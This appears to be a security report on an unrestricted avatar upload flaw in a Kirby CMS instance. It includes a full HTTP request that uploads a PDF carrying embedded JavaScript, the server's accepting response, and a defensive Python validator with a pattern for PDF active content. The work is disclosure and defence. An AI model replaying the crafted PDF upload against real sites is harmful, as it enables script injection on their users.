The tester discovered a vulnerability in the profile image upload function that could allow an attacker to upload malicious files.
Request:
POST /BGZUwFZY/api//users/jbW4NDxe/avatar HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=1bc7df720a15899644132fd4ff535669a5c1b4f4%2B1707758673.c75811a0ad74047fc0a1.3e95b8a5b3724f53bb555793894e427819144a027ed5bbe4fc80a17686a5b1c4; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F
Content-Length: 851
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypM54MYp6koSelY0N
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://trykirby.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://trykirby.com/BGZUwFZY/panel/users/jbW4NDxe
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarypM54MYp6koSelY0N
Content-Disposition: form-data; name="file"; filename="infected.pdf"
Content-Type: application/pdf

%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\("XSS"\)
} catch \(e\) {
app.alert\(e.message\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
------WebKitFormBoundarypM54MYp6koSelY0N--
Response:
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 16:10:37 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 1125
Connection: close
Content-Type: application/json; charset=UTF-8

{"status":"ok","data":{"content":{"uuid":"pcTvlsQe1jNTiSzu"},"dimensions":{"dimensions":null},"exists":true,"extension":"pdf","filename":"profile.pdf","id":"jbW4NDxe\/profile.pdf","link":"\/users\/jbW4NDxe\/files\/profile.pdf","mime":"application\/pdf","modified":"2024-02-12T16:10:37+00:00","name":"profile","next":null,"niceSize":"660\u00a0B","options":{"access":true,"changeName":true,"changeTemplate":false,"create":true,"delete":true,"list":true,"read":true,"replace":true,"update":true},"parent":{"avatar":{"filename":"profile.pdf","id":"jbW4NDxe\/profile.pdf","type":"document","url":"https:\/\/trykirby-1653.kxcdn.com\/BGZUwFZY\/media\/users\/jbW4NDxe\/b3218c149b-1707754237\/profile.pdf?width=512&height=512&crop=center"},"email":"[email protected]","id":"jbW4NDxe","language":"en","name":"sa","role":{"description":"The admin has all rights","name":"admin","title":"Admin"},"username":"sa","uuid":"user:\/\/jbW4NDxe"},"prev":null,"size":660,"template":"avatar","type":"document","url":"https:\/\/trykirby.com\/BGZUwFZY\/media\/users\/jbW4NDxe\/b3218c149b-1707754237\/profile.pdf","uuid":"file:\/\/pcTvlsQe1jNTiSzu"}}
Unrestricted file upload vulnerabilities occur when a web application allows users to upload files without proper validation, which can lead to serious security risks. Attackers can exploit this vulnerability to upload malicious files such as scripts or executable files, leading to various security issues including remote code execution. To mitigate unrestricted file upload vulnerabilities, consider the following solutions:
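One server-side check for an avatar endpoint, given here as an added example that is not part of the original report and is not Kirby's own code: the file's leading bytes are matched against an image allowlist, and the client-supplied filename and Content-Type must agree with them. The names `validate_avatar`, `sniff_image_type` and `IMAGE_TYPES` are hypothetical, and the sample inputs are constructed.

```python
import re

# Allowlist: magic bytes and extensions for the only types an avatar needs.
IMAGE_TYPES = {
    "image/png": ((b"\x89PNG\r\n\x1a\n",), {"png"}),
    "image/jpeg": ((b"\xff\xd8\xff",), {"jpg", "jpeg"}),
    "image/gif": ((b"GIF87a", b"GIF89a"), {"gif"}),
}
# PDF names that introduce actions or scripts (/AA, /JS, /JavaScript appear in
# the request above). Heuristic for logging only: names can be hex-escaped or
# hidden in compressed streams, so the rejection below never depends on it.
PDF_ACTIVE = re.compile(rb"/(JavaScript|JS|AA|OpenAction|Launch)\b")

def sniff_image_type(data: bytes):
    """Return the image MIME type implied by the leading bytes, or None."""
    for mime, (signatures, _) in IMAGE_TYPES.items():
        if data.startswith(signatures):
            return mime
    return None

def validate_avatar(filename: str, declared_mime: str, data: bytes):
    """Return (accepted, reason). File content decides; client metadata must agree."""
    sniffed = sniff_image_type(data)
    if sniffed is None:
        if data.lstrip().startswith(b"%PDF-"):
            found = sorted({m.decode() for m in PDF_ACTIVE.findall(data)})
            return False, "pdf rejected; active content: " + (",".join(found) or "none")
        return False, "content is not an allowed image type"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in IMAGE_TYPES[sniffed][1]:
        return False, f"extension .{ext} does not match {sniffed}"
    if declared_mime != sniffed:
        return False, f"declared type {declared_mime} does not match {sniffed}"
    return True, sniffed

# Constructed samples: a PDF skeleton shaped like the uploaded body, and a PNG header.
SAMPLE_PDF = (b"%PDF-1.3\n3 0 obj\n<</AA\n<</O\n<</JS\n(placeholder)\n"
              b"/S /JavaScript>>>>\n/Type /Page>>\nendobj\n%%EOF\n")
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    print(validate_avatar("infected.pdf", "application/pdf", SAMPLE_PDF))
    print(validate_avatar("profile.png", "image/png", SAMPLE_PDF))
    print(validate_avatar("profile.png", "image/png", SAMPLE_PNG))
```

A PDF renamed to `profile.png` with a forged `image/png` Content-Type is still rejected, because the decision is taken on the bytes and not on the request metadata.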